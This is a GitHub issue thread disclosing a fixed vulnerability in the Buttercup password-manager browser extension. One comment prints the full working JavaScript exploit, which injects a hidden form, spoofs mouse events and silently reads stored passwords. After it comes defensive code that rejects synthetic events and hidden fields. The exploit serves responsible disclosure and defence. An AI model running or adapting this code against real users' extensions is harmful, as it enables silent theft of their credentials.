
Security Vulnerability when browsing compromised sites

With the Chrome extension installed, any web page can query the password store without the user’s permission.

I’ve written a getPassword function that works like so:

```js
const password = await getPassword('github.com');
// 'mysecretpassword'
```

I know this is still beta but it’s had over 1K downloads on the Chrome Web Store so probably best not to post my source publicly. What’s the best way to contact you privately with more information?

Update: This has now been resolved. Full disclosure here: https://github.com/buttercup/buttercup-browser-extension/issues/92#issuecomment-372991430

Issue Analytics

  • State: closed
  • Created 6 years ago
  • Comments: 14 (7 by maintainers)

Top GitHub Comments

4 reactions
lukechilds commented, Mar 14, 2018

No problem, congrats on getting the fix out.

For anyone interested or looking how to prevent this kind of attack, the original message I sent in private explaining the exploit is below:


Ok, so this is my source code for the getPassword function:

```js
const getPassword = query => new Promise(async resolve => {
  // Poll the DOM every 100 ms until an element matching `selector` exists.
  const waitForElem = selector => new Promise(resolve => {
    const interval = setInterval(() => {
      const elem = document.querySelector(selector);
      if(elem) {
        resolve(elem);
        clearInterval(interval);
      }
    }, 100);
  });

  // Inject a hidden login form. The <style> also hides Buttercup's own popup
  // container, so nothing becomes visible while the picker is being driven.
  const body = await waitForElem('body');
  const container = document.createElement('div');
  container.innerHTML = `
    <style>
      .buttercup-password-stealer,
      [data-buttercup-role="container"] {
        display: none;
      }
    </style>
    <form class="buttercup-password-stealer">
      <input name="password" type="password">
      <input type="submit">
    </form>
  `;
  body.appendChild(container);

  // Wait until Buttercup has tagged the injected field, then fake the mouse
  // activity that makes the extension open its credential picker.
  const password = await waitForElem('.buttercup-password-stealer [data-buttercup-input="password"]');
  password.dispatchEvent(new MouseEvent('mousemove', { clientX: 99999999 }));
  password.dispatchEvent(new MouseEvent('click'));

  // When the picker fills the form and triggers the submit button, block the
  // real submit, read the filled-in value and remove all traces from the DOM.
  container.querySelector('[type="submit"]').onclick = e => {
    e.preventDefault();
    resolve(password.value);
    container.remove();
  };

  // Type the query into the picker's search box and click the first result.
  const search = await waitForElem('[data-buttercup-role="container"] input');
  search.value = query;
  search.dispatchEvent(new CustomEvent('input'));

  const entry = await waitForElem('[data-buttercup-role="listbox"] div div');
  entry.click();
});
```

When the function is called it’ll inject a hidden password form into the DOM, wait for Buttercup to detect it, spoof some mouse events that will trigger the popup to open, search for the user supplied query in the Buttercup popup, listen for the form submit event and capture the password value, then clean everything up and remove the DOM elements. It requires no user interaction, doesn’t stop normal usage of Buttercup and doesn’t display anything visible on page or do anything to raise suspicion. It executes in a few hundred milliseconds and can run arbitrary search queries against the password store. e.g.:

```js
// Specific URL
const githubPassword = await getPassword('github.com');
// 'mysecretpassword'

// Fuzzy search
const cryptoExchangePassword = await getPassword('bitcoin');
// 'mysecretpassword'
```
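The exploit above leans on two things a content script can detect: the mouse events are fabricated with `dispatchEvent`, and the form it targets is hidden with `display: none`. The following is an added example, not Buttercup's code and not the fix the issue links to, showing how a password manager's content script could gate its reaction to a password field on both signals. The function names, the `evaluateAutofillRequest` policy, the `view` parameter (stands in for `window`) and the element stand-ins are all assumptions constructed so the logic runs outside a browser.

```javascript
// Added example, not Buttercup's code: gate a password manager's reaction to
// activity on a password field so the two tricks the exploit above relies on
// (synthetic MouseEvents and a display:none form) are refused.

// Events a page fabricates with `new MouseEvent()` + `dispatchEvent()` carry
// isTrusted === false; only the browser itself produces isTrusted === true,
// and page scripts cannot forge that flag.
function isGenuineUserEvent(event) {
  return Boolean(event) && event.isTrusted === true;
}

// Walk from the field up to the root. Checking only the field's own computed
// style is not enough: `display: none` on an ancestor (the hidden <form> in the
// exploit) does not change the descendant's computed `display`. `view` is
// whatever supplies getComputedStyle (window in a browser; a stand-in below).
function isFieldVisible(field, view) {
  for (let node = field; node; node = node.parentElement) {
    const style = view.getComputedStyle(node);
    if (style.display === 'none' || style.visibility === 'hidden') return false;
    if (parseFloat(style.opacity) === 0) return false;
  }
  // A rendered field occupies space; an unrendered one reports a 0x0 box.
  const rect = field.getBoundingClientRect();
  return rect.width > 0 && rect.height > 0;
}

// Policy: open the credential picker only for a trusted click on a visible
// password field. The reason string is for the extension's own audit log.
function evaluateAutofillRequest(event, field, view) {
  if (!isGenuineUserEvent(event)) return { allow: false, reason: 'synthetic event' };
  if (!field || field.type !== 'password') return { allow: false, reason: 'not a password field' };
  if (!isFieldVisible(field, view)) return { allow: false, reason: 'field not visible' };
  return { allow: true, reason: 'ok' };
}

// --- Constructed stand-ins so the policy runs outside a browser (Node) -------
function makeElement({ type = null, style = {}, parent = null, box = { width: 0, height: 0 } } = {}) {
  return {
    type,
    parentElement: parent,
    cssStyle: { display: 'block', visibility: 'visible', opacity: '1', ...style },
    getBoundingClientRect: () => ({ width: box.width, height: box.height }),
  };
}
const fakeView = { getComputedStyle: el => el.cssStyle };

// Scenario 1: the exploit as posted: hidden <form>, fabricated click.
function exploitScenario() {
  const hiddenForm = makeElement({ style: { display: 'none' } });
  const field = makeElement({ type: 'password', parent: hiddenForm });
  return evaluateAutofillRequest({ type: 'click', isTrusted: false }, field, fakeView);
}

// Scenario 2: a real user click on a rendered login form.
function legitimateScenario() {
  const form = makeElement();
  const field = makeElement({ type: 'password', parent: form, box: { width: 200, height: 24 } });
  return evaluateAutofillRequest({ type: 'click', isTrusted: true }, field, fakeView);
}

// Scenario 3: a real click, but on a field inside a fully transparent form
// placed under a decoy button (opacity: 0 elements still receive genuine
// clicks): refused by the ancestor walk.
function decoyScenario() {
  const form = makeElement({ style: { opacity: '0' } });
  const field = makeElement({ type: 'password', parent: form, box: { width: 200, height: 24 } });
  return evaluateAutofillRequest({ type: 'click', isTrusted: true }, field, fakeView);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(exploitScenario(), legitimateScenario(), decoyScenario());
}
```

These checks are a defence-in-depth layer, not the whole fix. The exploit's other lever, typing into `[data-buttercup-role="container"] input` and clicking entries in `[data-buttercup-role="listbox"]`, exists only because the picker is rendered inside the page's DOM, where page scripts can read and drive it. Rendering the picker in an extension-origin iframe or the extension's own popup, which page scripts cannot reach, removes that lever entirely; the page itself does not say which route Buttercup's fix took, it only links to it.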
1 reaction
perry-mitchell commented, Jan 17, 2018

Planning on releasing tomorrow… So hopefully this will end up in production soon. Firefox update may be slower due to historically poor review performance on their part.
